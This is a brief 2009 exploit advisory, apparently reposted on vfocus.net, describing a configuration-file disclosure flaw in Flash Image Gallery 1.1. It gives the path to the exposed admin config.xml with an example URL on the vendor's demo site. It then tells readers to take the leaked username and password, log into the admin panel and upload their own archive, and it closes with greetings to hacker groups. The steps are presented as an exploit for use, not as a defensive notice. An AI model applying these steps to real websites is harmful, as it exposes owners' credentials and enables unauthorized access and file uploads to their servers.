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Flash Image Gallery 1.1 Arbitrary Config File Disclosure Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-05-27  
[0x01] Informations:

Script         : Flash Image Gallery 1.1 and maybe last version
Download       : http://www.flashimagegallery.com/download/fig_116_admin_110.zip
Vulnerability  : Sensitive Data Disclosure
Author         : DarkbiteX
Greets:        : |OverclockiX| , |0o_Zeuz_o0|, |Status-X|, |Fatal Inside|, |NaOnack|, |Good-Spide|, |All Moroccan Hackers|

Bug:[Sensitive Data Disclosure]

[!] EXPLOIT: /[path]/admin/config.xml
EXAMPLE: http://www.flashimagegallery.com/demo/gallery/admin/config.xml
                 and paste de user and pass http://www.flashimagegallery.com/demo/gallery/admin/
                 Use Of The Imagination and UPLOAD your archive ;) 

# [2009-05-26]

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